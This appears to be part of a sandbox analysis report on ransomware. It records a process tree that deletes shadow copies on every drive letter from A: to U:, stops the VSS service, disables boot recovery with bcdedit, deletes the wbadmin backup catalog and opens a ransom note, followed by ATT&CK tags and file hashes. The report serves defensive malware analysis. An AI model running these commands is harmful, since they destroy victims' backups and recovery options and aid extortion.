C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /For=U: /All /Quiet2⤵
- System Location Discovery: System Language Discovery
PID:2816 -
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /For=U: /All /Quiet3⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:2672
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /For=T: /All /Quiet2⤵
- System Location Discovery: System Language Discovery
PID:2924 -
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /For=T: /All /Quiet3⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:2184
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /For=S: /All /Quiet2⤵
- System Location Discovery: System Language Discovery
PID:2764 -
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /For=S: /All /Quiet3⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:2008
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /For=R: /All /Quiet2⤵
- System Location Discovery: System Language Discovery
PID:2664 -
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /For=R: /All /Quiet3⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:112
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /For=Q: /All /Quiet2⤵
- System Location Discovery: System Language Discovery
PID:2252 -
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /For=Q: /All /Quiet3⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:2088
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /For=P: /All /Quiet2⤵
- System Location Discovery: System Language Discovery
PID:668 -
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /For=P: /All /Quiet3⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:2788
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /For=O: /All /Quiet2⤵
- System Location Discovery: System Language Discovery
PID:2844 -
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /For=O: /All /Quiet3⤵
- Interacts with shadow copies
PID:2016
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /For=N: /All /Quiet2⤵
- System Location Discovery: System Language Discovery
PID:2912 -
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /For=N: /All /Quiet3⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:1448
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /For=M: /All /Quiet2⤵
- System Location Discovery: System Language Discovery
PID:1932 -
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /For=M: /All /Quiet3⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:848
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /For=L: /All /Quiet2⤵
- System Location Discovery: System Language Discovery
PID:1352 -
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /For=L: /All /Quiet3⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:1872
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /For=K: /All /Quiet2⤵
- System Location Discovery: System Language Discovery
PID:2548 -
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /For=K: /All /Quiet3⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:2584
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /For=J: /All /Quiet2⤵
- System Location Discovery: System Language Discovery
PID:1036 -
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /For=J: /All /Quiet3⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:628
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /For=I: /All /Quiet2⤵
- System Location Discovery: System Language Discovery
PID:2116 -
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /For=I: /All /Quiet3⤵
- Interacts with shadow copies
PID:836
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /For=H: /All /Quiet2⤵
- System Location Discovery: System Language Discovery
PID:2936 -
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /For=H: /All /Quiet3⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:1692
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /For=G: /All /Quiet2⤵
- System Location Discovery: System Language Discovery
PID:3032 -
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /For=G: /All /Quiet3⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:608
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /For=F: /All /Quiet2⤵
- System Location Discovery: System Language Discovery
PID:1552 -
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /For=F: /All /Quiet3⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:2000
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /For=E: /All /Quiet2⤵
- System Location Discovery: System Language Discovery
PID:1668 -
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /For=E: /All /Quiet3⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:2712
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /For=D: /All /Quiet2⤵
- System Location Discovery: System Language Discovery
PID:1648 -
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /For=D: /All /Quiet3⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:1484
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /For=C: /All /Quiet2⤵
- System Location Discovery: System Language Discovery
PID:2340 -
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /For=C: /All /Quiet3⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:568
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /For=B: /All /Quiet2⤵
- System Location Discovery: System Language Discovery
PID:2292 -
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /For=B: /All /Quiet3⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:3092
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /For=A: /All /Quiet2⤵
- System Location Discovery: System Language Discovery
PID:2312 -
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /For=A: /All /Quiet3⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:3100
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C net stop vss2⤵
- System Location Discovery: System Language Discovery
PID:2364 -
C:\Windows\SysWOW64\net.exenet stop vss3⤵
- System Location Discovery: System Language Discovery
PID:3132 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop vss4⤵
- System Location Discovery: System Language Discovery
PID:3176
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} recoveryenabled No2⤵PID:3108
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- System Location Discovery: System Language Discovery
PID:3144
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" bcdedit /set {default} recoveryenabled No2⤵
- System Location Discovery: System Language Discovery
PID:3192
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" bcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- System Location Discovery: System Language Discovery
PID:3216
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" bcdedit /set bootstatuspolicy ignoreallfailures2⤵PID:3364
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set bootstatuspolicy ignoreallfailures2⤵
- System Location Discovery: System Language Discovery
PID:3376
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" bcdedit /set recoveryenabled NO2⤵PID:3420
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set recoveryenabled NO2⤵
- System Location Discovery: System Language Discovery
PID:3432
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet2⤵
- System Location Discovery: System Language Discovery
PID:3504
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" wbadmin delete catalog -quiet2⤵
- System Location Discovery: System Language Discovery
PID:3532
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Documents\# HELP_DECRYPT_YOUR_FILES #.TXT2⤵
- System Location Discovery: System Language Discovery
PID:3648
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1936
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:920
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Direct Volume Access
1Indicator Removal
2File Deletion
2Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5ac8d86831e37b01871264094cb89bb22
SHA1bc8a034753e7b738eb1eb6c74304a64bf7970010
SHA256aa036d9f9d8aa4329d8815b78ecae49893a7fe1f064fbd6b1a42115db6dab5e8
SHA5120e998581d36db1217908e16fe08d529365117a17efadbb892d2ddf8cb0b50e519bf849224cb50a66011c68813a4660d17aff52dbaba8deb6e2489f8258838594
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
3KB
MD5d7009ba025c96b2a98f578f54894063a
SHA17c0044d11276410d362ccd58158e3ca7376dbda3
SHA256efc5834ae9a7350f12c3c4d9c00eaf9c934e4bfb3a9b28091e9b39988c558605
SHA512a09981914f8370de3685bf7005631780b809e2db5abdecee1ace156c5fa6719c71600f63c6f81099678a30054710cc8d9c3bfa90cd38149f7318dd5c950664ec